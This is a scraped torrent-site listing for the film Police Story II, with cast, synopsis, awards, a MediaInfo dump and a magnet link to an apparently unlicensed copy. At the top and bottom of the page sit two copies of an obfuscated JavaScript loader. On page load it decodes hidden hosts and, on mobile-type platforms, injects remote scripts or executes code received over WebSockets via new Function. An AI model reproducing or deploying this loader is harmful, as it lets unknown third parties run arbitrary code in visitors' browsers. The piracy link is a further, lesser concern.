警察故事续集[国粤语配音/中文字幕].Police.Story.II.1988.4K.Remastered.1080p.BluRay.x265.10bit.DTS.2Audio 8.66GB

B4dmin7 1月前 210

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 警察故事续集 / 警察故事2 / Police Story II

◎片 名 警察故事續集

◎年 代 1988

◎产 地 中国香港

◎类 别 喜剧 / 动作 / 犯罪

◎语 言 粤语

◎上映日期 1988-08-20(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt0095403/

◎豆瓣评分 7.7/10 (50960人评价)

◎豆瓣链接 https://movie.douban.com/subject/1304726/

◎片 长 101分钟

◎导 演 成龙 Jackie Chan (id:1054531)

◎编 剧 成龙 Jackie Chan (id:1054531)

邓景生 Edward Tang (id:1298905)

◎演 员 成龙 Jackie Chan (id:1054531)

张曼玉 Maggie Cheung (id:1274231)

陈国新 Dennis Chan (id:1319568)

楚原 Yuen Chor (id:1275401)

曹查理 Charlie Cho (id:1275320)

商天娥 Tin-Ngoh Seung (id:1145127)

张午郎 John Cheung (id:1348971)

董骠 Bill Tung (id:1274446)

王伟 Wai Wong (id:1274583)

梁韵蕊 Anglie Leung (id:1353901)

黄曼凝 Isabella Wong (id:1341914)

麦天恩 Mak Tin Yan (id:1366437)

李忠志 Chung Chi Li (id:1014763)

韩春 Chun Han (id:1418677)

甘国卫 Sam Kam (id:1350325)

王文駿 Man-Chun Wong (id:1441056)

詹秉熙 Bing Hei Chim (id:1315174)

叶荣祖 Wing-Cho Yip (id:1314277)

卢惠光 Ken Lo (id:1032633)

火星 Mars (id:1033056)

郭锦恩 Crystal Kwok (id:1046416)

午马 Wu Ma (id:1054282)

关山 Shan Kwan (id:1103354)

江欣燕 Elvina Kong (id:1104138)

刘青云 Sean Lau (id:1007251)

林国斌 Ben Lam (id:1289293)

楼南光 Billy Lau (id:1289501)

黎强权 Benny Lai Keung-Kuen (id:1316555)

吴声发 Sing Fat Ng (id:1330542)

戴志伟 Chi Wai Tai (id:1327384)

刘兆铭 Lau Siu Ming (id:1313719)

焦姣 Chiao Chiao (id:1046117)

太保 Po Tai (id:1312993)

周文健 Michael Chow Man-Kin (id:1317086)

何家劲 Kenny Ho (id:1014913)

邓景生 Edward Tang (id:1298905)

邹文怀 Raymond Chow (id:1016883)

何冠昌 Leonard Ho (id:1286717)

J·彼得·罗宾逊 J. Peter Robinson (id:1050708)

黄锐民 Oliver Wong (id:1290844)

陈顾方 Shirley Chan (id:1280438)

周少龙 Shao Lung Chou (id:1344862)

◎标 签 成龙 / 动作 / 香港 / 香港电影 / 喜剧 / 张曼玉 / 警匪 / 1988

◎简 介

英雄警察陈家驹(成龙 饰)又回来了。不过,性格火爆、直言不讳的他这次因为不满意上司放走了一个极其危险的重犯而和上司吵翻了,愤然辞职。脱离了警察生活的家驹和女友去旅行期间,一间电话公司遭到了炸弹恐吓,本性难移的家驹马上赶到了现场,着手调查案件。

岂料一波未平,一波又起。这个炸弹狂徒竟然炸毁了警局的大门,还绑架了家驹的女友,要求家驹携带大量赎款前往货仓交换人质。当家驹身带巨款抵达货仓时,发现这里已经布满了炸弹……

◎获奖情况 (共3项)

第25届台北金马影展 (1988)

金马奖 最佳剧情片(提名)

金马奖 最佳美术设计

└──黄锐民 (id:1290844)

第8届香港电影金像奖 (1989)

最佳动作设计

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 260024623888163301339818548073279027390 (0xC39EEBC2E1F98D649B75B38431EC78BE)

  4. Complete name : Police.Story[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.66 GiB

  8. Duration : 2 h 1 min

  9. Overall bit rate : 10.2 Mb/s

  10. Encoded date : UTC 2021-10-24 04:28:51

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 2 h 1 min

  20. Bit rate : 7 112 kb/s

  21. Width : 1 920 pixels

  22. Height : 820 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.188

  30. Stream size : 6.05 GiB (70%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=19.5000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=9 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x820 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default : Yes

  34. Forced : No


  35. Audio #1

  36. ID : 2

  37. ID in the original source medium : 4352 (0x1100)

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 2 h 1 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 16 bits

  49. Compression mode : Lossy

  50. Stream size : 1.28 GiB (15%)

  51. Title : Cantonese

  52. Language : Chinese

  53. Default : Yes

  54. Forced : No

  55. Original source medium : Blu-ray


  56. Audio #2

  57. ID : 3

  58. ID in the original source medium : 4353 (0x1101)

  59. Format : DTS

  60. Format/Info : Digital Theater Systems

  61. Codec ID : A_DTS

  62. Duration : 2 h 1 min

  63. Bit rate mode : Constant

  64. Bit rate : 1 509 kb/s

  65. Channel(s) : 6 channels

  66. Channel layout : C L R Ls Rs LFE

  67. Sampling rate : 48.0 kHz

  68. Frame rate : 93.750 FPS (512 SPF)

  69. Bit depth : 16 bits

  70. Compression mode : Lossy

  71. Stream size : 1.28 GiB (15%)

  72. Title : Mandarin

  73. Language : Chinese

  74. Default : No

  75. Forced : No

  76. Original source medium : Blu-ray


  77. Text #1

  78. ID : 4

  79. ID in the original source medium : 4609 (0x1201)

  80. Format : PGS

  81. Muxing mode : zlib

  82. Codec ID : S_HDMV/PGS

  83. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  84. Duration : 1 h 54 min

  85. Bit rate : 30.0 kb/s

  86. Count of elements : 2460

  87. Stream size : 24.7 MiB (0%)

  88. Title : chs

  89. Language : Chinese

  90. Default : Yes

  91. Forced : No

  92. Original source medium : Blu-ray


  93. Text #2

  94. ID : 5

  95. ID in the original source medium : 4608 (0x1200)

  96. Format : PGS

  97. Muxing mode : zlib

  98. Codec ID : S_HDMV/PGS

  99. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration : 1 h 54 min

  101. Bit rate : 32.3 kb/s

  102. Count of elements : 2460

  103. Stream size : 26.5 MiB (0%)

  104. Title : cht

  105. Language : Chinese

  106. Default : No

  107. Forced : No

  108. Original source medium : Blu-ray


  109. Text #3

  110. ID : 6

  111. ID in the original source medium : 4610 (0x1202)

  112. Format : PGS

  113. Muxing mode : zlib

  114. Codec ID : S_HDMV/PGS

  115. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration : 1 h 54 min

  117. Bit rate : 30.1 kb/s

  118. Count of elements : 2460

  119. Stream size : 24.8 MiB (0%)

  120. Title : eng

  121. Language : English

  122. Default : No

  123. Forced : No

  124. Original source medium : Blu-ray


  125. Menu

  126. 00:00:00.000 : 第 01 章

  127. 00:06:40.583 : 第 02 章

  128. 00:10:22.916 : 第 03 章

  129. 00:15:31.750 : 第 04 章

  130. 00:20:17.333 : 第 05 章

  131. 00:24:57.250 : 第 06 章

  132. 00:30:20.000 : 第 07 章

  133. 00:40:05.208 : 第 08 章

  134. 00:50:38.625 : 第 09 章

  135. 00:54:57.958 : 第 10 章

  136. 01:00:31.666 : 第 11 章

  137. 01:05:47.000 : 第 12 章

  138. 01:09:55.541 : 第 13 章

  139. 01:18:40.041 : 第 14 章

  140. 01:26:04.500 : 第 15 章

  141. 01:32:02.291 : 第 16 章

  142. 01:39:44.125 : 第 17 章

  143. 01:45:37.125 : 第 18 章

  144. 01:52:10.250 : 第 19 章

  145. 01:58:54.000 : 第 20 章




复制代码


TAGS 动作 犯罪 喜剧

磁力链:
  • magnet:?xt=urn:btih:770FAFFFF5A4A9BB953C90BD27A7FF8AAEBA5816

上传的附件:
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};